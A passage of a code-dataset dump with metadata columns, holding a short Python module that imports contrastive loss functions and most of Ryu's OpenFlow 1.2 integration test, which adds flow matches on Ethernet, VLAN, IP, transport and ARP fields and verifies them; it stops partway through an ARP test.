hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
53eb0bb4ff846eb7cbffee069987194135195bdf | 514 | py | Python | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | src/losses/__init__.py | N1kYan/vssil | 214363f1a924414415cfef940404d8057f6912e7 | [
"MIT"
] | null | null | null | from .temporal_separation_loss import temporal_separation_loss
from .perception_encoding_loss import perception_loss
from .spatial_consistency_loss import spatial_consistency_loss
from .time_contrastive_loss import time_contrastive_triplet_loss
from .pixelwise_contrastive_loss_v3 import pixelwise_contrastive_loss_patch_based
from .pixelwise_contrastive_loss_v4 import pixelwise_contrastive_loss_fmap_based
from .pixelwise_contrastive_loss_v6 import pwcl
from .pixelwise_contrastive_loss_v7 import pwcl as pwcl2
| 51.4 | 81 | 0.916342 | 70 | 514 | 6.214286 | 0.328571 | 0.241379 | 0.331034 | 0.257471 | 0.151724 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010438 | 0.068093 | 514 | 9 | 82 | 57.111111 | 0.897704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
53efe7db216ad385dabb5ea67288b8747bf74809 | 39,247 | py | Python | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | 1 | 2020-01-19T04:50:17.000Z | 2020-01-19T04:50:17.000Z | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | null | null | null | ryu/tests/integrated/test_add_flow_v12_matches.py | t-lin/ryu | 34ed41cc4149a4c5789d06b66ec13533ab51652a | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
import itertools
from ryu.ofproto import ofproto_v1_2
from ryu.ofproto import ether
from ryu.ofproto import inet
from ryu.tests.integrated import tester
LOG = logging.getLogger(__name__)
class RunTest(tester.TestFlowBase):
""" Test case for add flows of Matches
"""
OFP_VERSIONS = [ofproto_v1_2.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(RunTest, self).__init__(*args, **kwargs)
self._verify = []
def add_matches(self, dp, match):
m = dp.ofproto_parser.OFPFlowMod(dp, 0, 0, 0,
dp.ofproto.OFPFC_ADD,
0, 0, 0, 0xffffffff,
dp.ofproto.OFPP_ANY,
0xffffffff, 0, match, [])
dp.send_msg(m)
def verify_default(self, dp, stats):
verify = self._verify
self._verify = []
headers = value = mask = None
if len(verify) == 3:
(headers, value, mask, ) = verify
else:
return "self._verify is invalid."
f_value = f_mask = None
for f in stats[0].match.fields:
if f.header in headers:
f_value = f.value
if len(headers) == 2:
f_mask = f.mask
break
if f_value == value and f_mask == mask:
return True
elif value == None:
return "Field[%s] is setting." % (headers, )
else:
return "Value error. send: (%s/%s), val:(%s/%s)" \
% (value, mask, f_value, f_mask)
def test_rule_set_dl_dst(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst(dl_dst_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_ff(self, dp):
dl_dst = 'd0:98:79:b4:75:b5'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_f0(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
dl_dst_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_dst_masked_00(self, dp):
dl_dst = 'e2:7a:09:79:0b:0f'
dl_dst_bin = self.haddr_to_bin(dl_dst)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_DST,
dp.ofproto.OXM_OF_ETH_DST_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst_masked(dl_dst_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src(dl_src_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_ff(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_f0(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
dl_src_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_src_masked_00(self, dp):
dl_src = 'e2:7a:09:79:0b:0f'
dl_src_bin = self.haddr_to_bin(dl_src)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ETH_SRC,
dp.ofproto.OXM_OF_ETH_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_src_masked(dl_src_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_dl_type_ip(self, dp):
dl_type = ether.ETH_TYPE_IP
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_arp(self, dp):
dl_type = ether.ETH_TYPE_ARP
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_vlan(self, dp):
dl_type = ether.ETH_TYPE_8021Q
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_ipv6(self, dp):
dl_type = ether.ETH_TYPE_IPV6
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_dl_type_lacp(self, dp):
dl_type = ether.ETH_TYPE_SLOW
self._verify = [(dp.ofproto.OXM_OF_ETH_TYPE, ),
dl_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
self.add_matches(dp, match)
def test_rule_set_ip_dscp(self, dp):
ip_dscp = 36
dl_type = ether.ETH_TYPE_IP
self._verify = [(dp.ofproto.OXM_OF_IP_DSCP, ),
ip_dscp, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_dscp(ip_dscp)
self.add_matches(dp, match)
def test_rule_set_vlan_vid(self, dp):
vlan_vid = 0x4ef
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid(vlan_vid)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_ff(self, dp):
vlan_vid = 0x4ef
mask = 0xfff
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_f0(self, dp):
vlan_vid = 0x4ef
mask = 0xff0
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
vlan_vid & mask, mask]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_vid_masked_00(self, dp):
vlan_vid = 0x4ef
mask = 0x000
self._verify = [(dp.ofproto.OXM_OF_VLAN_VID,
dp.ofproto.OXM_OF_VLAN_VID_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid_masked(vlan_vid, mask)
self.add_matches(dp, match)
def test_rule_set_vlan_pcp(self, dp):
vlan_vid = 0x4ef
vlan_pcp = 5
self._verify = [(dp.ofproto.OXM_OF_VLAN_PCP, ),
vlan_pcp, None]
match = dp.ofproto_parser.OFPMatch()
match.set_vlan_vid(vlan_vid)
match.set_vlan_pcp(vlan_pcp)
self.add_matches(dp, match)
def test_rule_set_ip_ecn(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_ecn = 3
self._verify = [(dp.ofproto.OXM_OF_IP_ECN, ),
ip_ecn, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_ecn(ip_ecn)
self.add_matches(dp, match)
def test_rule_set_ip_proto_icmp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_tcp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_udp(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_route(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ROUTING
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_frag(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_FRAGMENT
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_icmp(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_none(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_NONE
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ip_proto_ipv6_dstopts(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_DSTOPTS
self._verify = [(dp.ofproto.OXM_OF_IP_PROTO, ),
ip_proto, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
self.add_matches(dp, match)
def test_rule_set_ipv4_src(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src(src_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_32(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_24(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
src_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_src_masked_0(self, dp):
dl_type = ether.ETH_TYPE_IP
src = '192.168.196.250'
src_int = self.ipv4_to_int(src)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_SRC,
dp.ofproto.OXM_OF_IPV4_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_src_masked(src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst(dst_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_32(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_24(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
dst_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv4_dst_masked_0(self, dp):
dl_type = ether.ETH_TYPE_IP
dst = '192.168.54.155'
dst_int = self.ipv4_to_int(dst)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV4_DST,
dp.ofproto.OXM_OF_IPV4_DST_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv4_dst_masked(dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_tcp_src(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
tp_src = 1103
self._verify = [(dp.ofproto.OXM_OF_TCP_SRC, ),
tp_src, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_tcp_src(tp_src)
self.add_matches(dp, match)
def test_rule_set_tcp_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_TCP
tp_dst = 236
self._verify = [(dp.ofproto.OXM_OF_TCP_DST, ),
tp_dst, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_tcp_dst(tp_dst)
self.add_matches(dp, match)
def test_rule_set_udp_src(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
tp_src = 56617
self._verify = [(dp.ofproto.OXM_OF_UDP_SRC, ),
tp_src, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_udp_src(tp_src)
self.add_matches(dp, match)
def test_rule_set_udp_dst(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_UDP
tp_dst = 61278
self._verify = [(dp.ofproto.OXM_OF_UDP_DST, ),
tp_dst, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_udp_dst(tp_dst)
self.add_matches(dp, match)
def test_rule_set_icmpv4_type(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
icmp_type = 8
self._verify = [(dp.ofproto.OXM_OF_ICMPV4_TYPE, ),
icmp_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv4_type(icmp_type)
self.add_matches(dp, match)
def test_rule_set_icmpv4_code(self, dp):
dl_type = ether.ETH_TYPE_IP
ip_proto = inet.IPPROTO_ICMP
icmp_type = 9
icmp_code = 16
self._verify = [(dp.ofproto.OXM_OF_ICMPV4_CODE, ),
icmp_code, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv4_type(icmp_type)
match.set_icmpv4_code(icmp_code)
self.add_matches(dp, match)
def test_rule_set_arp_opcode(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_op = 1
self._verify = [(dp.ofproto.OXM_OF_ARP_OP, ),
arp_op, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_opcode(arp_op)
self.add_matches(dp, match)
def test_rule_set_arp_spa(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa(nw_src_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_32(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_24(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
nw_src_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_spa_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_src = '192.168.222.57'
nw_src_int = self.ipv4_to_int(nw_src)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SPA,
dp.ofproto.OXM_OF_ARP_SPA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_spa_masked(nw_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa(nw_dst_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_32(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '255.255.255.255'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_24(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '255.255.255.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
nw_dst_int & mask_int, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_tpa_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
nw_dst = '192.168.198.233'
nw_dst_int = self.ipv4_to_int(nw_dst)
mask = '0.0.0.0'
mask_int = self.ipv4_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_TPA,
dp.ofproto.OXM_OF_ARP_TPA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tpa_masked(nw_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_arp_sha(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
